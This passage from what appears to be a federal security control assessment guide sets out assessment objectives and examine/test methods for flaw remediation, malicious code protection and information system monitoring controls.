| Interview: [SELECT FROM: Organizational personnel with flaw remediation responsibilities]. (M) (H) | |
| SI-2(1) | FLAW REMEDIATION |
| Control Enhancement: | |
| The organization centrally manages the flaw remediation process and installs updates automatically. | |
| SI-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization centrally manages the flaw remediation process and installs updates automatically. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy; procedures addressing flaw remediation; automated mechanisms supporting centralized management of flaw remediation and automatic software updates; information system design documentation; information system configuration settings and associated documentation; list of information system flaws; list of recent security flaw remediation actions performed on the information system; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms supporting centralized management of flaw remediation and automatic software updates]. (H) | |
| SI-2(2) | FLAW REMEDIATION |
| Control Enhancement: | |
| The organization employs automated mechanisms to periodically and upon demand determine the state of information system components with regard to flaw remediation. | |
| SI-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to periodically and upon demand determine the state of information system components with regard to flaw remediation. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy; procedures addressing flaw remediation; automated mechanisms supporting flaw remediation; information system design documentation; information system configuration settings and associated documentation; list of information system flaws; list of recent security flaw remediation actions performed on the information system; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information system flaw remediation update status]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| SI-3 | MALICIOUS CODE PROTECTION |
| Control: The information system implements malicious code protection. | |
| Supplemental Guidance: The organization employs malicious code protection mechanisms at critical information system entry and exit points (e.g., firewalls, electronic mail servers, web servers, proxy servers, remote-access servers) and at workstations, servers, or mobile computing devices on the network. The organization uses the malicious code protection mechanisms to detect and eradicate malicious code (e.g., viruses, worms, Trojan horses, spyware) transported: (i) by electronic mail, electronic mail attachments, Internet accesses, removable media (e.g., USB devices, diskettes or compact disks), or other common means; or (ii) by exploiting information system vulnerabilities. The organization updates malicious code protection mechanisms (including the latest virus definitions) whenever new releases are available in accordance with organizational configuration management policy and procedures. The organization considers using malicious code protection software products from multiple vendors (e.g., using one vendor for boundary devices and servers and another vendor for workstations). The organization also considers the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the information system. NIST Special Publication 800-83 provides guidance on implementing malicious code protection. | |
| SI-3.1 | ASSESSMENT OBJECTIVE: |
Determine if the information system implements malicious code protection by verifying that:
| |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy; procedures addressing malicious code protection; NIST Special Publication 800-83; malicious code protection mechanisms; records of malicious code protection updates; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Malicious code protection capability]. (M) (H) | |
| SI-3(1) | MALICIOUS CODE PROTECTION |
| Control Enhancement: | |
| The organization centrally manages malicious code protection mechanisms. | |
| SI-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization centrally manages malicious code protection mechanisms. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy; procedures addressing malicious code protection; information system design documentation; malicious code protection mechanisms; records of malicious code protection updates; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| SI-3(2) | MALICIOUS CODE PROTECTION |
| Control Enhancement: | |
| The information system automatically updates malicious code protection mechanisms. | |
| SI-3(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization automatically updates malicious code protection mechanisms. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy; procedures addressing malicious code protection; information system design documentation; malicious code protection mechanisms; records of malicious code protection updates; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| SI-4 | INFORMATION SYSTEM MONITORING TOOLS AND TECHNIQUES |
| Control: The organization employs tools and techniques to monitor events on the information system, detect attacks, and provide identification of unauthorized use of the system. | |
| Supplemental Guidance: Information system monitoring capability is achieved through a variety of tools and techniques (e.g., intrusion detection systems, intrusion prevention systems, malicious code protection software, audit record monitoring software, network monitoring software). Monitoring devices are strategically deployed within the information system (e.g., at selected perimeter locations, near server farms supporting critical applications) to collect essential information. Monitoring devices are also deployed at ad hoc locations within the system to track specific transactions. Additionally, these devices are used to track the impact of security changes to the information system. The granularity of the information collected is determined by the organization based upon its monitoring objectives and the capability of the information system to support such activities. Organizations consult appropriate legal counsel with regard to all information system monitoring activities. Organizations heighten the level of information system monitoring activity whenever there is an indication of increased risk to organizational operations, organizational assets, or individuals based on law enforcement information, intelligence information, or other credible sources of information. NIST Special Publication 800-61 provides guidance on detecting attacks through various types of security technologies. NIST Special Publication 800-83 provides guidance on detecting malware-based attacks through malicious code protection software. NIST Special Publication 800-92 provides guidance on monitoring a |